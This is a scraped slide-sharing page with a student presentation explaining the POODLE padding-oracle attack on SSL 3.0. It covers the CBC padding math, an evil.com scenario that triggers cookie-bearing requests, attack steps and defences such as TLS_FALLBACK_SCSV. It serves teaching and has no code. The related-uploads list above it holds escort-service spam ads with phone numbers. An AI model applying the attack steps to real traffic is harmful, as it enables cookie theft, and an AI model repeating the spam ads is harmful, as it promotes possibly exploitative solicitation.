SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )
 
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSHARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
 
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptx
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
 
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
 
Analog to Digital and Digital to Analog Converter
Analog to Digital and Digital to Analog ConverterAnalog to Digital and Digital to Analog Converter
Analog to Digital and Digital to Analog Converter
 
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
Software Development Life Cycle By Team Orange (Dept. of Pharmacy)
 
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLSMANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptx
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
 
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCRCall Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
Call Us -/9953056974- Call Girls In Vikaspuri-/- Delhi NCR
 
★ CALL US 9953330565 ( HOT Young Call Girls In Badarpur delhi NCR
★ CALL US 9953330565 ( HOT Young Call Girls In Badarpur delhi NCR★ CALL US 9953330565 ( HOT Young Call Girls In Badarpur delhi NCR
★ CALL US 9953330565 ( HOT Young Call Girls In Badarpur delhi NCR
 
247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).ppt
247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).ppt247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).ppt
247267395-1-Symmetric-and-distributed-shared-memory-architectures-ppt (1).ppt
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
 

Poodle

  • 1. POODLE This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz Presented By: Samit Anwer
  • 2. Padding Oracle On Downgraded Legacy Encryption • If attacker interferes with a handshake offering TLS 1.0 or later, clients will downgrade to SSL 3.0 • Encryption in SSL 3.0 uses either the RC4 stream cipher or a block cipher (AES/DES) in CBC mode • We will be taking a running example of AES in CBC mode of operation • Assumption: • the attacker can modify network transmissions between client and server
  • 3. • Attacker sends link to victim (http://evil.com) • When victim visits the link, the Javascript embedded on evil.com starts making cookie bearing requests to https://example.com A HTTP request looks like: POST /path Cookie: name=value...rnrn body • The attacker can MITM the encrypted traffic and attacker controls data in “path” and “body”. Attack Scenario
  • 4. POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn Pi Pn P1 CiC1 Cn Ci = EK(Pi Ꚛ Ci-1) C0 = IV Cipher Block Chaining Encryption EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF AES block size is 16 bytes DES block size is 8 bytes
  • 5. Cipher Block Chaining Decryption Pi = DK(Ci) Ꚛ Ci-1 C0 = IV C1 CnCi P1 Pi Pn C1 C2 Ci Cn-1 Cn P1 P2 Pi Pn-1 Pn POST /path Cookie: name=value...rnrnbody ‖ 20byte MAC ‖ padding EnCt29642a9666ee9dbc8c0306acacb63bf8dcf2c554d9642a9666ee9dbc8c0306acae2n1AGm0vgFHgpMKrFgwdWAEF Back
  • 6. POST /path Cookie: sessionid=value...rnrnbody ‖ 20byte MAC ‖ padding Padding of 1 to L bytes (where L is the block size in bytes) is added before performing blockwise CBC The attacker controls the request path & request body & hence can forge requests such that: 1. The padding fills an entire block (encrypted into Cn). 2. The cookie’s first (as of yet unknown) byte appears as the final byte in an earlier block (which gets encrypted into Ci). • The attacker replaces Cn by any earlier ciphertext block Ci • the ciphertext will be accepted if DK(Ci) ⊕ Cn-1 happens to have 15 as its final byte, • otherwise, it will be rejected  giving rise to a padding oracle attack The attack Ci Cn
  • 7. Attack Contd. Assuming L=16 (AES) and ciphertext gets accepted: From (a): 15 = DK(Ci) [15] ⊕ Cn-1[15] , which can be written as => DK(Ci) [15] = 15 ⊕ Cn-1[15] --------- (1) We know: Pi = DK(Ci) ⊕ Ci-1 and hence Pi[15] = DK(Ci) [15] ⊕ Ci-1[15] --------- (2) By replacing DK(Ci) [15] from (1) in (2) we get Pi[15] = 15 ⊕ Cn-1[15] ⊕ Ci-1[15] Unknown entity Known entity C1 Cn /CiCn-1 P1 Pn-1 Pn From CBC decryption (here) we know: Pi = DK(Ci) Ꚛ Ci-1  Pn = DK(Cn) Ꚛ Cn-1  Pn[15] = DK(Cn)[15] Ꚛ Cn-1[15] ----- (a) C1 C2 Ci Cn-1 Cn/Ci DK(Cn /Ci)
  • 8. Overall Effort • 256 SSL 3.0 requests per byte Recommendation • disabling the SSL 3.0 protocol in the client or in the server or both • TLS_FALLBACK_SCSV • when an incoming connection includes 0x56, 0x00 (TLS_FALLBACK_SCSV) in ClientHello.cipher_suites, compare ClientHello.client_version to the highest protocol version supported by the server. If the server supports a version higher than the one indicated by the client, reject the connection Problem with SSL 3.0 in CBC mode: The integrity of padding cannot be verified when decrypting as it is not covered by the MAC
  • 10. Attack Steps: • Degrade TLS protocol usage to SSLv3 by disruption of TLS handshake attempts. • Justify the URL and POST length such that the last block of the ciphertext is padding. • Perform the copy operation on every generated TLS packet and calculate the leaked byte if the server accepts the modified packet.
  • 11. References • This POODLE Bites: Exploiting The SSL 3.0 Fallback Bodo Möller, Thai Duong, Krzysztof Kotowicz https://www.openssl.org/~bodo/ssl-poodle.pdf • Attack of the week: POODLE, https://blog.cryptographyengineering.com/2014/10/15/attack-of- week-poodle/ • Implementing the POODLE Attack, https://patzke.org/implementing-the-poodle-attack.html

Editor's Notes

  1. An initialization vector (IV) or starting variable (SV)[5] is a block of bits that is used by several modes to randomize the encryption and hence to produce distinct ciphertexts even if the same plaintext is encrypted multiple times, without the need for a slower re-keying process.
  2. Now observe that if there’s a full block of padding and an attacker replaces Cn by any earlier ciphertext block Ci from the same encrypted stream, the ciphertext will still be accepted if DK(Ci) ⊕ Cn-1 happens to have L-1 as its final byte, but will in all likelihood be rejected otherwise, giving rise to a padding oracle attack